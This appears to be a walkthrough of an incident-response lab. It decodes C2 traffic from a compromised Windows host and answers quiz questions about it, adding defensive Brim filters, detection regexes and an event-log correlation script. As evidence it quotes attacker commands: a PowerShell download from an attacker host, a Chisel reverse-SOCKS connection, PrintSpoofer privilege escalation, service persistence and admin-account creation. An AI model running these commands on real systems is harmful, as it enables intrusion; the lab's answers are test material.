The malicious c2 binary sends a payload using a parameter that contains the executed command results. What is the parameter used by the binary?

q

The malicious c2 binary connects to a specific URL to get the command to be executed. What is the URL used by the binary?

/9ab62b5

What is the HTTP method used by the binary?

GET

Based on the user agent, what programming language was used by the attacker to compile the binary?

Format: Answer in lowercase

Nim

Discovery - Internal Reconnaissance

Internal Reconnaissance

Based on the collected findings, we have discovered that the malicious binary continuously uses the C2 traffic:

  • We can easily decode the encoded string in the network traffic.

  • The traffic contains the command and output executed by the attacker.

Investigation Guide

To continue with the investigation, we may focus on the following information:

  • Find network and process events connecting to the malicious domain.

  • Find network events that contain an encoded command.

  • We can use Brim to filter all packets containing the encoded string.

  • Look for endpoint enumeration commands since the attacker is already inside the machine.

In addition, we may refer to our cheatsheet for Brim to quickly investigate the encoded traffic with the following filters:

  • To get all HTTP requests related to the malicious C2 traffic: _path=="http" "<replace domain>" id.resp_p==<replace port> | cut ts, host, id.resp_p, uri | sort ts

Significant Data Sources:

  • Packet Capture

  • Sysmon

Answer the questions below

_path=="http" "<replace domain>" id.resp_p==<replace port> | cut ts, host, id.resp_p, uri | sort ts

d2hvYW1pIC0gdGVtcGVzdFxiZW5pbWFydQ0K

whoami - tempest\benimaru

cHdkIC0gDQpQYXRoICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgDQpDOlxXaW5kb3dzXHN5c3RlbTMyDQoNCg0K

pwd - 
Path               
----               
C:\Windows\system32


dir C:\Users - 

    Directory: C:\Users


Mode                LastWriteTime         Length Name                                                                   
----                -------------         ------ ----                                                                   
d-----        6/20/2022   9:06 PM                benimaru                                                               
d-r---        6/20/2022   4:03 PM                Public                                                                 
d-----        6/20/2022  11:52 PM                rimuru  

bmV0IHVzZXJzIC0gDQpVc2VyIGFjY291bnRzIGZvciBcXFRFTVBFU1QNCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KQWRtaW5pc3RyYXRvciAgICAgICAgICAgIGJlbmltYXJ1ICAgICAgICAgICAgICAgICBEZWZhdWx0QWNjb3VudCAgICAgICAgICAgDQpHdWVzdCAgICAgICAgICAgICAgICAgICAgcmltdXJ1ICAgICAgICAgICAgICAgICAgIFdEQUdVdGlsaXR5QWNjb3VudCAgICAgICANClRoZSBjb21tYW5kIGNvbXBsZXRlZCBzdWNjZXNzZnVsbHkuDQoNCg==

net users - 
User accounts for \\TEMPEST

-------------------------------------------------------------------------------
Administrator            benimaru                 DefaultAccount           
Guest                    rimuru                   WDAGUtilityAccount       
The command completed successfully.

bmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3RyYXRvcnMgLSBBbGlhcyBuYW1lICAgICBhZG1pbmlzdHJhdG9ycw0KQ29tbWVudCAgICAgICAgQWRtaW5pc3RyYXRvcnMgaGF2ZSBjb21wbGV0ZSBhbmQgdW5yZXN0cmljdGVkIGFjY2VzcyB0byB0aGUgY29tcHV0ZXIvZG9tYWluDQoNCk1lbWJlcnMNCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KQWRtaW5pc3RyYXRvcg0KcmltdXJ1DQpUaGUgY29tbWFuZCBjb21wbGV0ZWQgc3VjY2Vzc2Z1bGx5Lg0KDQo=

net localgroup administrators - Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
rimuru
The command completed successfully.



net user benimaru - User name                    benimaru
Full Name                    
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            6/20/2022 9:18:04 PM
Password expires             Never
Password changeable          6/20/2022 9:18:04 PM
Password required            No
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   6/21/2022 1:14:49 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use*Users                
Global Group memberships     *None                 
The command completed successfully.


dir C:\Users\benimaru - 

    Directory: C:\Users\benimaru


Mode                LastWriteTime         Length Name                                                                   
----                -------------         ------ ----                                                                   
d-r---        6/20/2022   4:13 PM                3D Objects                                                             
d-r---        6/20/2022   4:13 PM                Contacts                                                               
d-r---        6/21/2022  12:27 AM                Desktop                                                                
d-r---        6/20/2022   9:20 PM                Documents                                                              
d-r---        6/21/2022   1:13 AM                Downloads                                                              
d-r---        6/20/2022   4:13 PM                Favorites                                                              
d-r---        6/20/2022   4:13 PM                Links                                                                  
d-r---        6/20/2022   4:13 PM                Music                                                                  
dar---        6/21/2022   1:15 AM                OneDrive                                                               
d-r---        6/20/2022   4:13 PM                Pictures                                                               
d-r---        6/20/2022   4:13 PM                Saved Games                                                            
d-r---        6/20/2022   4:13 PM                Searches                                                               
d-r---        6/20/2022   5:57 PM                Videos   

ZGlyIEM6XFVzZXJzXGJlbmltYXJ1XGRvY3VtZW50cyAtIA==

dir C:\Users\benimaru\documents - 


dir C:\users\benimaru\Desktop - 

    Directory: C:\users\benimaru\Desktop


Mode                LastWriteTime         Length Name                                                                   
----                -------------         ------ ----                                                                   
-a----        6/20/2022  11:34 PM            268 automation.ps1                                                         
-a----        6/20/2022   4:13 PM           1446 Microsoft Edge.lnk        


cat C:\Users\Benimaru\Desktop\automation.ps1 - $user = "TEMPEST\benimaru"
$pass = "infernotempest"

$securePassword = ConvertTo-SecureString $pass -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $user, $securePassword

## TODO: Automate easy tasks to hack working hours


netstat -ano -p tcp - 
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       864
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       5508
  TCP    0.0.0.0:5357           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       4964
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       476
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1212
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1760
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2424
  TCP    0.0.0.0:49671          0.0.0.0:0              LISTENING       624
  TCP    0.0.0.0:49676          0.0.0.0:0              LISTENING       608
  TCP    192.168.254.107:139    0.0.0.0:0              LISTENING       4
  TCP    192.168.254.107:51802  52.139.250.253:443     ESTABLISHED     3216
  TCP    192.168.254.107:51839  34.104.35.123:80       TIME_WAIT       0
  TCP    192.168.254.107:51858  104.101.22.128:80      TIME_WAIT       0
  TCP    192.168.254.107:51860  20.205.146.149:443     TIME_WAIT       0
  TCP    192.168.254.107:51861  204.79.197.200:443     ESTABLISHED     4352
  TCP    192.168.254.107:51871  20.190.144.169:443     TIME_WAIT       0
  TCP    192.168.254.107:51876  52.178.17.2:443        ESTABLISHED     4388
  TCP    192.168.254.107:51878  20.60.178.36:443       ESTABLISHED     4388
  TCP    192.168.254.107:51881  52.109.124.115:443     ESTABLISHED     4388
  TCP    192.168.254.107:51882  52.139.154.55:443      ESTABLISHED     4388
  TCP    192.168.254.107:51884  40.119.211.203:443     ESTABLISHED     4388
  TCP    192.168.254.107:51895  52.152.90.172:443      ESTABLISHED     5508
  TCP    192.168.254.107:51896  20.44.229.112:443      ESTABLISHED     8904

cG93ZXJzaGVsbCBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy9jaC5leGUgLW91dGZpbGUgQzpcVXNlcnNcYmVuaW1hcnVcRG93bmxvYWRzXGNoLmV4ZSAtIA==

powershell iwr http://phishteam.xyz/02dcf07/ch.exe -outfile C:\Users\benimaru\Downloads\ch.exe - 


dir C:\Users\benimaru\Downloads\ch.exe - 

    Directory: C:\Users\benimaru\Downloads


Mode                LastWriteTime         Length Name                                                                   
----                -------------         ------ ----                                                                   
-a----        6/21/2022   1:17 AM        8230912 ch.exe                                                                 

that's all :)

search ch.exe

"C:\Users\benimaru\Downloads\ch.exe" client 167.71.199.191:8080 R:socks

MD5=527C71C523D275C8367B67BBEBF48E9F,SHA256=8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451,IMPHASH=C7269D59926FA4252270F407E4DAB043

https://www.virustotal.com/gui/file/8a99353662ccae117d2bb22efd8c43d7169060450be413af763e8ad7522d2451

C:\Windows\system32\wsmprovhost.exe -Embedding

https://research.splunk.com/endpoint/2eed004c-4c0d-11ec-93e8-3e22fbd008af/

evilwinrm

The attacker was able to discover a sensitive file inside the machine of the user. What is the password discovered on the aforementioned file?

infernotempest

The attacker then enumerated the list of listening ports inside the machine. What is the listening port that could provide a remote shell inside the machine?

5985

The attacker then established a reverse socks proxy to access the internal services hosted inside the machine. What is the command executed by the attacker to establish the connection?

Format: Remove the double quotes from the log.

*"C:\Users\benimaru\Downloads\ch.exe" client 167.71.199.191:8080 R:socks*

What is the SHA256 hash of the binary used by the attacker to establish the reverse socks proxy connection?

8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451

What is the name of the tool used by the attacker based on the SHA256 hash? Provide the answer in lowercase.

External research needed. Use the SHA256 hash to determine the name of the tool.

Chisel

The attacker then used the harvested credentials from the machine. Based on the succeeding process after the execution of the socks proxy, what service did the attacker use to authenticate?

Format: Answer in lowercase

External research needed. Use the process name to determine the service name.

WinRm

Privilege Escalation - Exploiting Privileges

Privilege Escalation

Based on the collected findings, the attacker gained a stable shell through a reverse socks proxy.

Investigation Guide

With this, we can focus on the following network and endpoint events:

  • Look for events executed after the successful execution of the reverse socks proxy tool.

  • Look for potential privilege escalation attempts, as the attacker has already established a persistent low-privilege access.

Significant Data Sources:

  • Packet Capture

  • Sysmon

Answer the questions below

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iwr http://phishteam.xyz/02dcf07/spf.exe -outfile spf.exe

search spf.exe

MD5=108DA75DE148145B8F056EC0827F1665,SHA256=8524FBC0D73E711E69D60C64F1F1B7BEF35C986705880643DD4D5E17779E586D,IMPHASH=545A81240793F9CA97306FA5B3AD76DF

https://www.virustotal.com/gui/file/8524fbc0d73e711e69d60c64f1f1b7bef35c986705880643dd4d5e17779e586d

looks like the same steps I'd done :)

from Clement
https://github.com/itm4n/PrintSpoofer

"C:\Users\benimaru\Downloads\spf.exe" -c C:\ProgramData\final.exe

After discovering the privileges of the current user, the attacker then downloaded another binary to be used for privilege escalation. What is the name and the SHA256 hash of the binary?

Format: binary name,SHA256 hash

spf.exe,8524FBC0D73E711E69D60C64F1F1B7BEF35C986705880643DD4D5E17779E586D

Based on the SHA256 hash of the binary, what is the name of the tool used?

Format: Answer in lowercase

External research needed. Use the SHA256 hash to determine the name of the exact tool used.

PrintSpoofer

The tool exploits a specific privilege owned by the user. What is the name of the privilege?

External research needed. Read about the tool to see the privilege being abused.

SeImpersonatePrivilege

Then, the attacker executed the tool with another binary to establish a c2 connection. What is the name of the binary?

final.exe

The binary connects to a different port from the first c2 connection. What is the port used?

8080

Actions on Objective - Fully-owned Machine

Fully-Owned Machine

Now, the attacker has gained administrative privileges inside the machine. Find all persistence techniques used by the attacker.

In addition, the unusual executions are related to the malicious C2 binary used during privilege escalation.

Investigation Guide

Now, we can rely on our cheatsheet to investigate events after a successful privilege escalation:

  • Useful Brim filter to get all HTTP requests related to the malicious C2 traffic: _path=="http" "<replace domain>" id.resp_p==<replace port> | cut ts, host, id.resp_p, uri | sort ts

  • The attacker gained SYSTEM privileges; now, the user context for each malicious execution blends with NT Authority\System.

  • All child events of the new malicious binary used for C2 are worth checking.

Significant Data Sources:

  • Packet Capture

  • Sysmon

  • Windows Event Logs

Answer the questions below

_path=="http" "resolvecyber.xyz" id.resp_p==8080 | cut ts, host, id.resp_p, uri | sort ts

d2hvYW1pIC0gbnQgYXV0aG9yaXR5XHN5c3RlbQ0K

whoami - nt authority\system

cHdkIC0gDQpQYXRoICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgDQpDOlxXaW5kb3dzXHN5c3RlbTMyDQoNCg0K

pwd - 
Path               
----               
C:\Windows\system32

bmV0IHVzZXIgc2h1bmEgcHJpbmNlc3MgLSA=

net user shuna princess - 


net users - 
User accounts for \\

-------------------------------------------------------------------------------
Administrator            benimaru                 DefaultAccount           
Guest                    rimuru                   WDAGUtilityAccount       
The command completed with one or more errors.

bmV0IHVzZXIgc2h1bmEgLSA=

net user shuna - 

bmV0IHVzZXIgc2h1bmEgcHIxbmMzc3MhIC0g

net user shuna pr1nc3ss! - 


net users - 
User accounts for \\

-------------------------------------------------------------------------------
Administrator            benimaru                 DefaultAccount           
Guest                    rimuru                   WDAGUtilityAccount       
The command completed with one or more errors.

bmV0IHVzZXIgc2hpb24gbTRzdDNyY2gzZiEgLSA=

net user shion m4st3rch3f! - 


net users - 
User accounts for \\

-------------------------------------------------------------------------------
Administrator            benimaru                 DefaultAccount           
Guest                    rimuru                   WDAGUtilityAccount       
The command completed with one or more errors.

bmV0IHVzZXIgQWRtaW5pc3RyYXRvciBjaDRuZzNkcGFzc3dvcmQhIC0gVGhlIGNvbW1hbmQgY29tcGxldGVkIHN1Y2Nlc3NmdWxseS4NCg0K

net user Administrator ch4ng3dpassword! - The command completed successfully.

Y21kLmV4ZSAvYyBuZXQgdXNlciBzaGlvbiBtNHN0M3JjaDNmISEhIC0g

cmd.exe /c net user shion m4st3rch3f!!! - 


net users - 
User accounts for \\

-------------------------------------------------------------------------------
Administrator            benimaru                 DefaultAccount           
Guest                    rimuru                   WDAGUtilityAccount       
The command completed with one or more errors.



whoami /priv - 
PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeCreateTokenPrivilege                    Create a token object                                              Enabled
SeAssignPrimaryTokenPrivilege             Replace a process level token                                      Enabled
SeLockMemoryPrivilege                     Lock pages in memory                                               Enabled
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeTcbPrivilege                            Act as part of the operating system                                Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeCreatePermanentPrivilege                Create permanent shared objects                                    Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeAuditPrivilege                          Generate security audits                                           Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeTrustedCredManAccessPrivilege           Access Credential Manager as a trusted caller                      Enabled
SeRelabelPrivilege                        Modify an object label                                             Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

c2MuZXhlIFxcVEVNUEVTVCBjcmVhdGUgVGVtcGVzdFVwZGF0ZSBiaW5wYXRoPSBDOlxQcm9ncmFtRGF0YVxmaW5hbC5leGUgc3RhcnQ9IGF1dG8gLSBbU0NdIENyZWF0ZVNlcnZpY2UgRkFJTEVEIDEwNzM6DQoNClRoZSBzcGVjaWZpZWQgc2VydmljZSBhbHJlYWR5IGV4aXN0cy4NCg0K

sc.exe \\TEMPEST create TempestUpdate binpath= C:\ProgramData\final.exe start= auto - [SC] CreateService FAILED 1073:

The specified service already exists.

c2MuZXhlIFxcVEVNUEVTVCBjcmVhdGUgVGVtcGVzdFVwZGF0ZTIgYmlucGF0aD0gQzpcUHJvZ3JhbURhdGFcZmluYWwuZXhlIHN0YXJ0PSBhdXRvIC0gW1NDXSBDcmVhdGVTZXJ2aWNlIFNVQ0NFU1MNCg==

sc.exe \\TEMPEST create TempestUpdate2 binpath= C:\ProgramData\final.exe start= auto - [SC] CreateService SUCCESS


sc.exe qc TempestUpdate2 - [SC] QueryServiceConfig SUCCESS

SERVICE_NAME: TempestUpdate2
        TYPE               : 10  WIN32_OWN_PROCESS 
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\ProgramData\final.exe
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : TempestUpdate2
        DEPENDENCIES       : 
        SERVICE_START_NAME : LocalSystem

bmV0IHVzZXIgL2FkZCBzaHVuYSBwcmluY2VzcyAtIFRoZSBjb21tYW5kIGNvbXBsZXRlZCBzdWNjZXNzZnVsbHkuDQoNCg==

net user /add shuna princess - The command completed successfully.

bmV0IHVzZXIgL2FkZCBzaGlvbiBtNHN0M3JjaDNmISAtIFRoZSBjb21tYW5kIGNvbXBsZXRlZCBzdWNjZXNzZnVsbHkuDQoNCg==

net user /add shion m4st3rch3f! - The command completed successfully.

and now he can create users :)


net users - 
User accounts for \\

-------------------------------------------------------------------------------
Administrator            benimaru                 DefaultAccount           
Guest                    rimuru                   shion                    
shuna                    WDAGUtilityAccount       
The command completed with one or more errors.

confirmed

bmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3RyYXRvcnMgL2FkZCBzaGlvbiAtIFRoZSBjb21tYW5kIGNvbXBsZXRlZCBzdWNjZXNzZnVsbHkuDQoNCg==

net localgroup administrators /add shion - The command completed successfully.


net localgroup administrators - Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
rimuru
shion
The command completed successfully.

so shion 🤔 
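The C2 traffic above is shown as base64 payloads that decode to `<command> - <output>`. As an added example, not code from the original writeup, here is a small Python triage helper that decodes such payloads and tags the command shapes seen in this investigation; the tag names are this example's own, and the sample list is copied from payloads on this page plus one junk line to show the error path.

```python
import base64
import binascii
import re

# Constructed input for this example: base64 strings copied from the C2 traffic
# shown in this writeup, plus one junk entry. Each real one decodes to
# "<command> - <output>" with CRLF line endings.
SAMPLE_PAYLOADS = [
    "d2hvYW1pIC0gbnQgYXV0aG9yaXR5XHN5c3RlbQ0K",
    "bmV0IHVzZXIgc2h1bmEgcHJpbmNlc3MgLSA=",
    "bmV0IHVzZXIgL2FkZCBzaHVuYSBwcmluY2VzcyAtIFRoZSBjb21tYW5kIGNvbXBsZXRlZCBzdWNjZXNzZnVsbHkuDQoNCg==",
    "bmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3RyYXRvcnMgL2FkZCBzaGlvbiAtIFRoZSBjb21tYW5kIGNvbXBsZXRlZCBzdWNjZXNzZnVsbHkuDQoNCg==",
    "not-base64!!",  # junk line: must be skipped, not crash the triage
]

# Command shapes from this page that a defender wants flagged. The tag names
# are hypothetical labels chosen for this example.
PERSISTENCE_PATTERNS = {
    "account_creation": re.compile(r"\bnet\s+user\b.*?\s/add\b", re.I),
    # "net user <name> <password>" with no /add: a password change attempt
    "password_change": re.compile(r"\bnet\s+user\s+(?!/add)\S+\s+\S+", re.I),
    "admin_group_add": re.compile(r"\bnet\s+localgroup\s+administrators\b.*?\s/add\b", re.I),
    "service_creation": re.compile(r"\bsc(?:\.exe)?\b.*?\bcreate\b", re.I),
}


def decode_payload(b64: str):
    """Decode one payload into (command, output).

    Returns None when the string is not valid base64 or does not follow the
    "<command> - <output>" convention used by this C2 traffic.
    """
    try:
        raw = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None
    text = raw.decode("utf-8", errors="replace")
    cmd, sep, out = text.partition(" - ")  # first " - " is the separator
    if not sep:
        return None
    return cmd.strip(), out.replace("\r\n", "\n").strip()


def triage(payloads):
    """Decode every payload and tag commands that match persistence patterns."""
    findings = []
    for b64 in payloads:
        decoded = decode_payload(b64)
        if decoded is None:
            continue
        cmd, out = decoded
        tags = [name for name, rx in PERSISTENCE_PATTERNS.items() if rx.search(cmd)]
        findings.append({"command": cmd, "output": out, "tags": tags})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_PAYLOADS):
        flag = ",".join(f["tags"]) or "-"
        print(f"[{flag}] {f['command']!r} -> {f['output']!r}")
```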

The event ID that indicates the account creation activity in Windows event logs is 4720. This event is logged in the Security event log whenever a new user account is created on the system. The event includes information about the user account, such as the account name, security identifier (SID), and group memberships. It also includes information about the computer or domain where the account was created and the user who performed the account creation action.

The event ID that indicates the addition of a user to a sensitive local group in Windows event logs is 4732. This event is logged in the Security event log whenever a user account is added to a security-sensitive local group on the computer. The event includes information about the user account, such as the account name and security identifier (SID), as well as information about the group that the user was added to. This information can be used to identify potential security risks, such as unauthorized access to sensitive resources or privilege escalation.
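As an added example (not part of the original writeup), the two event IDs above can be joined into one detection: a 4720 followed within a short window by a 4732 into BUILTIN\Administrators for the same SID. The sample events below are constructed in Event Viewer XML form and wrapped in a root element so they parse as one document; the SIDs, timestamps and subject account are made up, not the room's evidence.

```python
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

EVT_NS = "http://schemas.microsoft.com/win/2004/08/events/event"
BUILTIN_ADMINISTRATORS_SID = "S-1-5-32-544"  # well-known SID of the local Administrators group

# Constructed sample (not the room's evidence): one 4720 per account created on
# this page, then a 4732 adding shion to Administrators. SIDs/times are made up.
SAMPLE_XML = f"""<Events>
<Event xmlns="{EVT_NS}"><System><EventID>4720</EventID>
 <TimeCreated SystemTime="2022-06-21T01:40:10.000Z"/><Computer>TEMPEST</Computer></System>
 <EventData><Data Name="TargetUserName">shuna</Data>
  <Data Name="TargetSid">S-1-5-21-100-200-300-1003</Data>
  <Data Name="SubjectUserName">TEMPEST$</Data></EventData></Event>
<Event xmlns="{EVT_NS}"><System><EventID>4720</EventID>
 <TimeCreated SystemTime="2022-06-21T01:40:25.000Z"/><Computer>TEMPEST</Computer></System>
 <EventData><Data Name="TargetUserName">shion</Data>
  <Data Name="TargetSid">S-1-5-21-100-200-300-1004</Data>
  <Data Name="SubjectUserName">TEMPEST$</Data></EventData></Event>
<Event xmlns="{EVT_NS}"><System><EventID>4732</EventID>
 <TimeCreated SystemTime="2022-06-21T01:41:02.000Z"/><Computer>TEMPEST</Computer></System>
 <EventData><Data Name="MemberName">-</Data>
  <Data Name="MemberSid">S-1-5-21-100-200-300-1004</Data>
  <Data Name="TargetUserName">Administrators</Data>
  <Data Name="TargetSid">{BUILTIN_ADMINISTRATORS_SID}</Data>
  <Data Name="SubjectUserName">TEMPEST$</Data></EventData></Event>
</Events>"""


def parse_events(xml_text):
    """Flatten each <Event> into {id, time, data}, with EventData keyed by Name."""
    events = []
    for ev in ET.fromstring(xml_text).iter(f"{{{EVT_NS}}}Event"):
        system = ev.find(f"{{{EVT_NS}}}System")
        event_id = int(system.findtext(f"{{{EVT_NS}}}EventID"))
        stamp = system.find(f"{{{EVT_NS}}}TimeCreated").get("SystemTime")
        time = datetime.fromisoformat(stamp.replace("Z", "+00:00"))
        data = {d.get("Name"): (d.text or "").strip()
                for d in ev.find(f"{{{EVT_NS}}}EventData")}
        events.append({"id": event_id, "time": time, "data": data})
    return events


def created_accounts(events):
    """Accounts created (4720), sorted the way the question above asks for them."""
    return sorted(e["data"]["TargetUserName"] for e in events if e["id"] == 4720)


def new_local_admins(events, window=timedelta(hours=1)):
    """Join each 4732 into BUILTIN\\Administrators back to the 4720 that created
    the same SID within `window`. 4732 often carries MemberName as "-" for local
    accounts, so the SID, not the name, is the reliable join key."""
    created_by_sid = {e["data"].get("TargetSid"): e for e in events if e["id"] == 4720}
    alerts = []
    for e in events:
        if e["id"] != 4732 or e["data"].get("TargetSid") != BUILTIN_ADMINISTRATORS_SID:
            continue
        creation = created_by_sid.get(e["data"].get("MemberSid"))
        if creation is None:
            continue  # pre-existing account added to the group: a different alert
        delta = e["time"] - creation["time"]
        if timedelta(0) <= delta <= window:
            alerts.append({"account": creation["data"]["TargetUserName"],
                           "seconds_after_creation": int(delta.total_seconds()),
                           "by": e["data"].get("SubjectUserName", "")})
    return alerts


if __name__ == "__main__":
    evts = parse_events(SAMPLE_XML)
    print("created:", ",".join(created_accounts(evts)))
    for a in new_local_admins(evts):
        print(f"ALERT new account {a['account']} added to Administrators "
              f"{a['seconds_after_creation']}s after creation by {a['by']}")
```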

Upon achieving SYSTEM access, the attacker then created two users. What are the account names?

Format: Answer in alphabetical order - comma delimited

shion,shuna

Prior to the successful creation of the accounts, the attacker executed commands that failed in the creation attempt. What is the missing option that made the attempt fail?

/add

Based on windows event logs, the accounts were successfully created. What is the event ID that indicates the account creation activity?

External research needed. Find out what event ID logs successful account creation.

4720

The attacker added one of the accounts in the local administrator's group. What is the command used by the attacker?

net localgroup administrators /add shion

Based on windows event logs, the account was successfully added to a sensitive group. What is the event ID that indicates the addition to a sensitive local group?

External research needed. Find out what event ID logs successful addition to a local group.

4732

After the account creation, the attacker executed a technique to establish persistent administrative access. What is the command executed by the attacker to achieve this?

Format: Remove the double quotes from the log.

*"C:\Windows\system32\sc.exe" \\TEMPEST create TempestUpdate binpath= C:\ProgramData\final.exe start= auto*

Eric Zimmerman has created a set of forensic tools used to analyse Windows artefacts called EZTools. For this task, we will focus on EvtxEcmd and Timeline Explorer, as these tools are mainly used for parsing and analysing Evtx logs.

Windows Event Logs
Sysmon
Wireshark: Packet Operations
Brim
EZTools (Eric Zimmerman's Tools)